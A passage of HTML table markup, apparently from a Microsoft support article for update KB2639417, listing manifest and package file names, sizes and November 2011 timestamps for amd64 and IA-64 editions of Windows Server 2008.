class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">2,451</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">24-Nov-2011</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">05:57</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Package_2_for_kb2639417~31bf3856ad364e35~amd64~~6.0.1.2.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">3,388</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">24-Nov-2011</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">05:57</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Package_3_for_kb2639417_bf~31bf3856ad364e35~amd64~~6.0.1.2.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span 
class=\"text-base\">File size</span></td><td class=\"sbody-td\">2,451</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">24-Nov-2011</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">05:57</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Package_3_for_kb2639417~31bf3856ad364e35~amd64~~6.0.1.2.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">3,388</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">24-Nov-2011</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">05:57</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Package_for_kb2639417_client_2_bf~31bf3856ad364e35~amd64~~6.0.1.2.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">1,693</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span 
class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">24-Nov-2011</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">05:57</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Package_for_kb2639417_client_2~31bf3856ad364e35~amd64~~6.0.1.2.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">1,720</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">24-Nov-2011</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">05:57</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Package_for_kb2639417_client_bf~31bf3856ad364e35~amd64~~6.0.1.2.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">1,434</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">24-Nov-2011</td></tr><tr class=\"sbody-tr\"><td 
class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">05:57</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Package_for_kb2639417_client~31bf3856ad364e35~amd64~~6.0.1.2.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">1,454</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">24-Nov-2011</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">05:57</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Package_for_kb2639417_sc_1_bf~31bf3856ad364e35~amd64~~6.0.1.2.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">1,689</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">24-Nov-2011</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">05:57</td></tr><tr class=\"sbody-tr\"><td 
class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Package_for_kb2639417_sc_1~31bf3856ad364e35~amd64~~6.0.1.2.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">1,716</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">24-Nov-2011</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">05:57</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Package_for_kb2639417_sc_bf~31bf3856ad364e35~amd64~~6.0.1.2.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">1,426</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">24-Nov-2011</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">05:57</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td 
class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Package_for_kb2639417_sc~31bf3856ad364e35~amd64~~6.0.1.2.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">1,446</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">24-Nov-2011</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">05:57</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Package_for_kb2639417_server_1_bf~31bf3856ad364e35~amd64~~6.0.1.2.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">1,693</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">24-Nov-2011</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">05:57</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td 
class=\"sbody-td\">Package_for_kb2639417_server_1~31bf3856ad364e35~amd64~~6.0.1.2.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">1,720</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">24-Nov-2011</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">05:57</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Package_for_kb2639417_server_bf~31bf3856ad364e35~amd64~~6.0.1.2.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">1,434</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">24-Nov-2011</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">05:57</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Package_for_kb2639417_server~31bf3856ad364e35~amd64~~6.0.1.2.mum</td></tr><tr class=\"sbody-tr\"><td 
class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">1,454</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">24-Nov-2011</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">05:57</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Update-bf.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">3,044</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">24-Nov-2011</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">05:57</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Wow64_microsoft-windows-win32k_31bf3856ad364e35_6.0.6002.18544_none_212602208488106d.manifest</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td 
class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">5,013</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">23-Nov-2011</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">16:16</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Wow64_microsoft-windows-win32k_31bf3856ad364e35_6.0.6002.22745_none_21b0a11b9da4c6b5.manifest</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">5,013</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">23-Nov-2011</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">15:47</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr></table></div><h4 class=\"sbody-h4\">Additional files for all supported IA-64-based versions of Windows Server 2008</h4><div class=\"table-responsive\"><table class=\"sbody-table table\"><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Ia64_3c18e2254f71b97d54647447077058b8_31bf3856ad364e35_6.0.6002.18544_none_9ecc51e4eb6105d8.manifest</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span 
class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">1,036</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">24-Nov-2011</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">05:57</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Ia64_abe3beb6ed278ac414180725ed4b99c3_31bf3856ad364e35_6.0.6002.22745_none_57a3ec69395f6964.manifest</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">1,036</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">24-Nov-2011</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">05:57</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Ia64_microsoft-windows-win32k_31bf3856ad364e35_6.0.6002.18544_none_bab4604097c7e638.manifest</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not 
Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">6,551</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">23-Nov-2011</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">16:03</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Ia64_microsoft-windows-win32k_31bf3856ad364e35_6.0.6002.22745_none_bb3eff3bb0e49c80.manifest</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">6,551</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">23-Nov-2011</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">15:30</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Package_1_for_kb2639417_bf~31bf3856ad364e35~ia64~~6.0.1.2.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td 
class=\"sbody-td\">2,281</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">24-Nov-2011</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">05:57</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Package_1_for_kb2639417~31bf3856ad364e35~ia64~~6.0.1.2.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">3,212</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">24-Nov-2011</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">05:57</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Package_2_for_kb2639417_bf~31bf3856ad364e35~ia64~~6.0.1.2.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">2,281</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td 
class=\"sbody-td\">24-Nov-2011</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">05:57</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Package_2_for_kb2639417~31bf3856ad364e35~ia64~~6.0.1.2.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">3,212</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">24-Nov-2011</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">05:57</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Package_for_kb2639417_sc_1_bf~31bf3856ad364e35~ia64~~6.0.1.2.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">1,521</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">24-Nov-2011</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td 
class=\"sbody-td\">05:57</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Package_for_kb2639417_sc_1~31bf3856ad364e35~ia64~~6.0.1.2.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">1,544</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">24-Nov-2011</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">05:57</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Package_for_kb2639417_sc_bf~31bf3856ad364e35~ia64~~6.0.1.2.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">1,422</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">24-Nov-2011</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">05:57</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td 
